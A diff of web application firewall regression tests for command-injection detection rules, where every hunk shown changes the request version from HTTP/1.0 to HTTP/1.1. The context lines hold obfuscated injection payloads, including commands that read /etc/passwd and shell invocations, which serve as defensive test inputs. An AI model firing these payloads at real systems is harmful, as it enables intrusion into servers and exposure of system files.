+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1456,7 +1456,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++%25VARIABLE%25+++LSS+0+++++Echo+An+error+was+found"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1472,7 +1472,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++%25VARIABLE%25+++EQU+0+++++Echo+An+error+was+found"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1488,7 +1488,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+%2FI+++++item1%3D%3Ditem2+++++++++++CMD"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1504,7 +1504,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+%2FI+NOT+item1%3D%3Ditem2+++++++++++CMD"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1520,7 +1520,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+%2FI+NOT+1%3D%3D2+++++++++++++++++++CMD"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1536,7 +1536,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++%25_prefix%25%3D%3DSS6+++++++++GOTO+they_matched"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1552,7 +1552,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++%5B%251%5D%3D%3D%5B%5D+++++++++++++++ECHO+Value+Missing"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1568,7 +1568,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++%5B%251%5D+EQU+%5B%5D++++++++++++ECHO+Value+Missing"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1584,7 +1584,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++%282+GEQ+15%29+++++++++++++echo+%22bigger%22"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1600,7 +1600,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++red%3D%3Dred+++++++++++++++echo+test"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1616,7 +1616,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++NOT+red%3D%3D%3Dred++++++++++++++echo+test"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1632,7 +1632,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+%2FI+++++Red%3D%3Dred+++++++++++++++echo+test"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1648,7 +1648,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+%281%29+equ+%281%29+echo+hey"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1664,7 +1664,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+not+%282+equ+2%29+echo+hey"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1680,7 +1680,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+%22%25VAR%25%22%3D%3D%25%25A+do+echo+true"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1696,7 +1696,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+%22%25%7E1%22+%3D%3D+%22%25%7E2%22+%28EXIT+%2FB+0%29+ELSE+%28EXIT+%2FB+1%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1712,7 +1712,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+%25n1%25+gtr+%25n2%25+echo+%25n1%25+is+greater+than+%25n2%25"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1728,7 +1728,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+%25n1%25+lss+%25n2%25+echo+%25n1%25+is+less+than+%25n2%25"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1744,7 +1744,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+%25n1%25+equ+%25n2%25+echo+%25n1%25+is+equal+to+%25n2%25"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1760,7 +1760,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+%22%25n1%25%22+gtr+%22%25n2%25%22+echo+%22%25n1%25%22+is+greater+than+%22%25n2%25%22"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1776,7 +1776,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+%22%25n1%25%22+lss+%22%25n2%25%22+echo+%22%25n1%25%22+is+less+than+%22%25n2%25%22"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1792,7 +1792,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+%22%25n1%25%22+equ+%22%25n2%25%22+echo+%22%25n1%25%22+is+equal+to+%22%25n2%25%22"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1808,7 +1808,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+not+defined+n1+set+%22n1%3D0%22"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1824,7 +1824,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+X%251%3D%3DX%2F%3F+GOTO+Helpscreen"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1840,7 +1840,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+%22%251%22%3D%3D%22%2F%3F%22+..."
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1856,7 +1856,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+%5B%251%5D%3D%3D%5B%2F%3F%5D+..."
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1872,7 +1872,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+%22%25%7E1%22%3D%3D%22%2F%3F%22+..."
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1888,7 +1888,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+ERRORLEVEL+3+IF+NOT+ERRORLEVEL+4+..."
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1904,7 +1904,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+NOT+DEFINED+BAR+%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1920,7 +1920,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+%22%25VAR%25%22+%3D%3D+%22before%22+%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1936,7 +1936,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+%22%25VAR%25%22+%3D%3D+%22after%22+%40echo+ok"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1952,7 +1952,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+%22%21VAR%21%22+%3D%3D+%22after%22+%40echo+ok"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1968,7 +1968,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+not+defined+BAR+set+FOO%3D1%26+echo+FOO%3A+%25FOO%25"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1984,7 +1984,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+%28%251%29%3D%3D%28LTRS%29+CD+C%3A%5CWORD%5CLTRS"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2000,7 +2000,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+%22%251%22%3D%3D%22%22+goto+ERROR"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2016,7 +2016,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+%28AA%29+%3D%3D+%28AA%29+echo+same"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2032,7 +2032,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+%5BAA%5D+%3D%3D+%5BAA%5D+echo+same"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2048,7 +2048,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+%22A+A%22+%3D%3D+%22A+A%22+echo+same"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2064,7 +2064,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+%25_prog%3A%7E-1%25+NEQ+%5C+%28Set+_prog%3D%25_prog%25%5C%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2080,7 +2080,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+EXIST+%22temp.txt%22+ECHO+found"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2096,7 +2096,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+NOT+EXIST+%22temp.txt%22+ECHO+not+found"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2112,7 +2112,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+%22%25var%25%22%3D%3D%22%22+%28SET+var%3Ddefault+value%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2128,7 +2128,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+NOT+DEFINED+var+%28SET+var%3Ddefault+value%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2144,7 +2144,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+%22%25var%25%22%3D%3D%22Hello%2C+World%21%22+%28ECHO+found%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2160,7 +2160,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+%2FI+%22%25var%25%22%3D%3D%22hello%2C+world%21%22+%28+ECHO+found+%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2176,7 +2176,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+%2FI+%22%25var%25%22+EQU+%221%22+ECHO+equality+with+1"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2192,7 +2192,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+%2FI+%22%25var%25%22+NEQ+%220%22+ECHO+inequality+with+0"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2208,7 +2208,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+%2FI+%22%25var%25%22+GEQ+%221%22+ECHO+greater+than+or+equal+to+1"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2224,7 +2224,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+%2FI+%22%25var%25%22+LEQ+%221%22+ECHO+less+than+or+equal+to+1"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2240,7 +2240,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+%2FI+%22%25ERRORLEVEL%25%22+NEQ+%220%22+%28ECHO+execution+failed%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2256,7 +2256,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+not+%251+%3D%3D+%22%22+%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2272,7 +2272,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+not+%22%251%22+%3D%3D+%22%22+%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2288,7 +2288,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+not+%7B%251%7D+%3D%3D+%7B%7D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2304,7 +2304,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+not+%22A%251%22+%3D%3D+%22A%22+%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2320,7 +2320,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+DEFINED+ARG+%28echo+%22It+is+defined%3A+%251%22%29+ELSE+%28echo+%22%25%251+is+not+defined%22%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2336,7 +2336,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if3q+hfy6e8egfxsjtewc838gsfbhwvw9qzfty3gjs86syg7y6mrpwgw4ekureakjpk6%2Flyghe9pnfekpw2yt8svzseinhs1rbkuu%2Fzq15u5wh8nj8dd+fn86qcdwzv3s9hw35e14pxgcv34dhmt1mwbxnicwudjawfqz+fphmr5vlnufdihoffpuvqwkcmom61i3lisyxg65fx+rgbnrs6e4pmbvy2xl+vwb8oct23cyypregi638dkychllvvw5kq7rolfbhk3hojxz9tthunqky9dodqbb6u8roh+firwx8kuf1dfgewcto9eljhuaoqgdk4qwxlziktaf1mw2atcmw7jvzsh1s0kngiepps54lj4wtcbfzfvbqb7y3caffhnvfrm3tbjxlywqakfqxoprh7yooguat5flg2ozx5%2Fafn7w%3D%3D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932140]
@@ -2352,7 +2352,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+a%3D%3Db+foo"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2368,7 +2368,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if%2Fi+a%3D%3Db+foo"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2384,7 +2384,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+%2Fi+a%3D%3Db+foo"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2400,7 +2400,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+%2Fi+%22a%22%3D%3D%22b%22++foo"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2416,7 +2416,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+%2Fi+not++%22a%22%3D%3D%22b%22++foo"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2432,7 +2432,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+++exist+StorageServer.port+echo+yay"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2448,7 +2448,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if+%2Fi+exist+StorageServer.port+echo+yay"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -2464,7 +2464,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=ifq+a%3D%3Db+foo"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932140]
@@ -2480,7 +2480,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=iffoo+a%3D%3Db+foo"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932140]
@@ -2496,7 +2496,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if3+a%3D%3Db+foo"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932140]
@@ -2512,7 +2512,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=if3q+a%3D%3Db+foo"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932140]
@@ -2533,7 +2533,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: <?xml version="1.0" encoding="UTF-8"?><note><pdf>if+foo==</pdf></note>
         output:
           log:
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml
index c2a0a6344..93582c934 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml
@@ -147,7 +147,7 @@ tests:
           port: 80
           # code=$SHELL -c "echo hi"
           uri: "/get?code=%24SHELL%20-c%20%22echo%20hi%22"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932160]
@@ -164,7 +164,7 @@ tests:
           port: 80
           # code=${SHELL} -c "echo hi"
           uri: "/get?code=%24%7BSHELL%7D%20-c%20%22echo%20hi%22"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932160]
@@ -180,7 +180,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?a=bin/ansible"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932160]
@@ -196,7 +196,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?a=bin/chef"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932160]
@@ -212,7 +212,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?a=bin/cscli"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932160]
@@ -228,7 +228,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?a=bin/visudo"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932160]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml
index 837b9b15c..381c93cfb 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml
@@ -18,7 +18,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932170]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml
index 4f1721ed8..ef74e285d 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml
@@ -17,7 +17,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?%28%29%20%7B"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932171]
@@ -34,7 +34,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?arg=%28%29%20%7B"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932171]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml
index fa512935b..0da30b60d 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml
@@ -18,7 +18,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932180]
@@ -36,7 +36,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             ------WebKitFormBoundaryABCDEFGIJKLMNOPQ
             Content-Disposition: form-data; name="config"; filename="config.yml"
@@ -66,7 +66,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             ------WebKitFormBoundaryABCDEFGIJKLMNOPQ
             Content-Disposition: form-data; name="image"; filename="test.jpg"
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml
index 2e2b5ae9b..2d26c4ec7 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml
@@ -17,7 +17,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?id=cat%2B%2Fet*%2F*wd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932190]
@@ -34,7 +34,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?id=cat%2B%2FET*%2F*WD"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932190]
@@ -51,7 +51,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?id=%2F%3F%3F%3F%2F%3Fs"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932190]
@@ -68,7 +68,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?id=Does%20the%20%2A%20shine%20bright%3F"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932190]
@@ -86,7 +86,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "{\"foo\" : \";+cat+/e't'*/pa'?s'wd\"}"
         output:
           log:
@@ -105,7 +105,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}"
         output:
           log:
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
index 74a8033e0..d3a448a77 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
@@ -16,7 +16,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?host=www.google.com;/bin/ca?+/et*/passwd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932200]
@@ -32,7 +32,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?host=www.google.com;cat+/etc/%24%7Ba%7Dpasswd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932200]
@@ -48,7 +48,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?host=www.google.com;cat+/etc/%24%28echo%29passwd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932200]
@@ -64,7 +64,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?host=www.google.com;c%24%40at%2B%2Fet%24%40c%2Fpas%24%40swd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932200]
@@ -80,7 +80,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?host=www.google.com;c%24%21at%2B%2Fet%24%21c%2Fpas%24%21swd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932200]
@@ -96,7 +96,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?host=www.google.com;c%24%2Aat%2B%2Fet%24%2Ac%2Fpas%24%2Aswd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932200]
@@ -112,7 +112,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?host=www.google.com;c%24%3Fat%2B%2Fet%24%3Fc%2Fpas%24%3Fswd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932200]
@@ -128,7 +128,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?host=www.google.com;c%24-at%2B%2Fet%24-c%2Fpas%24-swd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932200]
@@ -144,7 +144,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?host=www.google.com;c%24_at%2B%2Fet%24_c%2Fpas%24_swd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932200]
@@ -160,7 +160,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?host=www.google.com;c%24%24at%2B%2Fet%24%24c%2Fpas%24%24swd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932200]
@@ -177,7 +177,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?host=www.google.com;c%5Cat%20%2Fetc%2Fpasswd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932200]
@@ -194,7 +194,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?host=www.google.com;cat%20%2Fetc%2Fp%5Casswd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932200]
@@ -210,7 +210,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?host=www.google.com;/bin/ca?+/et*/passwd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             match_regex: 'found within ARGS:host:'
@@ -227,7 +227,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932200]
@@ -244,7 +244,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932200]
@@ -261,7 +261,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932200]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml
index 1fd9e4408..bf3c7ce21 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml
@@ -17,7 +17,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932205]
@@ -34,7 +34,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932205]
@@ -51,7 +51,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932205]
@@ -68,7 +68,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932205]
@@ -85,7 +85,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932205]
@@ -102,7 +102,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932205]
@@ -119,7 +119,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932205]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml
index 3cfb335e8..ec8ded45d 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml
